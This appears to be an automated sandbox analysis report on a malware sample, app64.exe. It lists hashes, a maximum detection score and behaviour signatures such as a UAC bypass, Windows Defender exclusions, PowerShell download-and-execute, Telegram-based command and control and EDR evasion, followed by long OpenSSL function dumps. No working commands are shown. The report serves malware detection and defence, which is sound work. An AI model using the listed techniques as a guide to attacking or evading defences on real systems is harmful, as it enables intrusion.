Windows Analysis Report
app64.exe

Overview

General Information

Sample name: app64.exe
Analysis ID: 1545289
MD5: 40b887735996fc88f47650c322273a25
SHA1: e2f583114fcd22b2083ec78f42cc185fb89dd1ff
SHA256: d762fccbc10d8a1c8c1c62e50bce8a4289c212b5bb4f1fe50f6fd7dd3772b14a
Tags: exeuser-NDA0E
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for dropped file
Source: C:\Windows\System32\x590769.dat ReversingLabs: Detection: 54%
Multi AV Scanner detection for submitted file
Source: app64.exe ReversingLabs: Detection: 26%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Windows\System32\x590769.dat Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9336A60 ERR_new,ERR_set_debug,SetLastError,BIO_write,BIO_test_flags,BIO_test_flags,ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A9336A60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E2F50 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once, 28_2_00007FF8A92E2F50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E42D0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,CRYPTO_strdup,OPENSSL_LH_new,OPENSSL_LH_set_thunks,ERR_new,X509_STORE_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,OPENSSL_sk_num,ERR_new,OPENSSL_sk_new_null,ERR_new,OPENSSL_sk_new_null,ERR_new,CRYPTO_new_ex_data,ERR_new,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A92E42D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EDAA0 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_new,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_memdup,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A92EDAA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9339730 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A9339730
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F4A20 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A92F4A20
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932AA70 CRYPTO_realloc, 28_2_00007FF8A932AA70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E4A72 CRYPTO_memdup,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92E4A72
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9304A60 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free, 28_2_00007FF8A9304A60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9346A30 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A9346A30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DCAB0 X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free, 28_2_00007FF8A92DCAB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9350AD0 CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9350AD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E6A90 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,OSSL_PARAM_construct_int,OSSL_PARAM_construct_end,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup, 28_2_00007FF8A92E6A90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D2A80 CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92D2A80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EAAD0 CRYPTO_set_ex_data, 28_2_00007FF8A92EAAD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932A940 CRYPTO_zalloc, 28_2_00007FF8A932A940
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931E960 BIO_ADDR_family,BIO_ADDR_family,memcmp,BIO_ADDR_family,BIO_ADDR_family,memcmp,CRYPTO_malloc,BIO_ADDR_clear,BIO_ADDR_clear, 28_2_00007FF8A931E960
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931A910 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free, 28_2_00007FF8A931A910
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D2940 CRYPTO_zalloc,_beginthreadex,CRYPTO_free, 28_2_00007FF8A92D2940
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9342930 CRYPTO_realloc, 28_2_00007FF8A9342930
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93449C0 CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A93449C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FC9A0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92FC9A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93569E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,EVP_CIPHER_free,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free, 28_2_00007FF8A93569E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E49F0 CRYPTO_memdup,CRYPTO_free, 28_2_00007FF8A92E49F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EE9C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug, 28_2_00007FF8A92EE9C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931AC50 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free, 28_2_00007FF8A931AC50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935CC60 BN_bin2bn,ERR_new,ERR_set_debug,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A935CC60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D2C60 CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A92D2C60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D8C60 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset, 28_2_00007FF8A92D8C60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F4CB0 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,memcpy, 28_2_00007FF8A92F4CB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9344CC0 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A9344CC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DECD0 COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort, 28_2_00007FF8A92DECD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9338CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a, 28_2_00007FF8A9338CA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9306B30 CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9306B30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DCB70 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_memdup,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup, 28_2_00007FF8A92DCB70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932EB20 CRYPTO_free, 28_2_00007FF8A932EB20
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9340B20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy, 28_2_00007FF8A9340B20
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933CB30 EVP_MD_get_size,ERR_new,ERR_set_debug,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,EVP_DigestUpdate,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key_ex,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free, 28_2_00007FF8A933CB30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9350B30 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A9350B30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9306BB0 CRYPTO_malloc, 28_2_00007FF8A9306BB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DAB80 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,X509_free,EVP_PKEY_free,d2i_PUBKEY_ex,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free, 28_2_00007FF8A92DAB80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FCB80 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92FCB80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EABF0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 28_2_00007FF8A92EABF0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931AB80 CRYPTO_free, 28_2_00007FF8A931AB80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9338B90 BIO_free,BIO_free,BIO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,CRYPTO_free, 28_2_00007FF8A9338B90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9348B90 CRYPTO_free,CRYPTO_memdup, 28_2_00007FF8A9348B90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9322BA0 OPENSSL_LH_retrieve,CRYPTO_zalloc,CRYPTO_free,OPENSSL_LH_insert,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_insert, 28_2_00007FF8A9322BA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932EED0 CRYPTO_malloc,CRYPTO_free, 28_2_00007FF8A932EED0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D4E80 CRYPTO_free, 28_2_00007FF8A92D4E80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F0EF0 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A92F0EF0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FCED0 CRYPTO_free,memset,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A92FCED0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9304D30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free, 28_2_00007FF8A9304D30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FCD10 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_memdup,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92FCD10
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932ED00 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A932ED00
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DEDB0 CRYPTO_THREAD_run_once, 28_2_00007FF8A92DEDB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932EDD0 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A932EDD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9350D80 CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9350D80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92ECDC0 CRYPTO_malloc,CRYPTO_clear_free, 28_2_00007FF8A92ECDC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9322DB0 OPENSSL_LH_retrieve,CRYPTO_free,OPENSSL_LH_delete,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free, 28_2_00007FF8A9322DB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D1030 GetEnvironmentVariableW,GetACP,MultiByteToWideChar,malloc,MultiByteToWideChar,GetEnvironmentVariableW,malloc,GetEnvironmentVariableW,WideCharToMultiByte,CRYPTO_malloc,WideCharToMultiByte,CRYPTO_free,free,free,getenv, 28_2_00007FF8A92D1030
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9323040 RAND_priv_bytes_ex,CRYPTO_zalloc,EVP_CIPHER_fetch,EVP_CIPHER_CTX_new,EVP_CIPHER_free,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_doall,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,EVP_CIPHER_free, 28_2_00007FF8A9323040
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B040 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A933B040
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DD010 EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92DD010
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F1000 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_realloc,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A92F1000
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E5070 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 28_2_00007FF8A92E5070
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E5050 CRYPTO_set_ex_data, 28_2_00007FF8A92E5050
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F5040 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A92F5040
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DB0B0 i2d_PUBKEY,ASN1_item_i2d,CRYPTO_free, 28_2_00007FF8A92DB0B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93410E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A93410E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932F0F0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy, 28_2_00007FF8A932F0F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9351090 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9351090
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93050D0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 28_2_00007FF8A93050D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9322F60 EVP_EncryptUpdate,OPENSSL_LH_retrieve, 28_2_00007FF8A9322F60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9346F60 memchr,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A9346F60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9322F00 OPENSSL_LH_free,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free, 28_2_00007FF8A9322F00
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9358FD0 CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A9358FD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933AFE0 CRYPTO_free, 28_2_00007FF8A933AFE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931CFF0 CRYPTO_realloc, 28_2_00007FF8A931CFF0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9332FA0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A9332FA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933EFA0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug, 28_2_00007FF8A933EFA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D6FC0 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug, 28_2_00007FF8A92D6FC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EE220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free, 28_2_00007FF8A92EE220
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F4260 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 28_2_00007FF8A92F4260
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E02B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,strncmp,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free, 28_2_00007FF8A92E02B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931A2C0 CRYPTO_zalloc,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free, 28_2_00007FF8A931A2C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93502C0 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A93502C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93582E7 ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A93582E7
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933A2E0 RAND_bytes_ex,CRYPTO_malloc,memset, 28_2_00007FF8A933A2E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93322F0 BIO_write_ex,BIO_write_ex,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A93322F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D62C0 CRYPTO_clear_free, 28_2_00007FF8A92D62C0
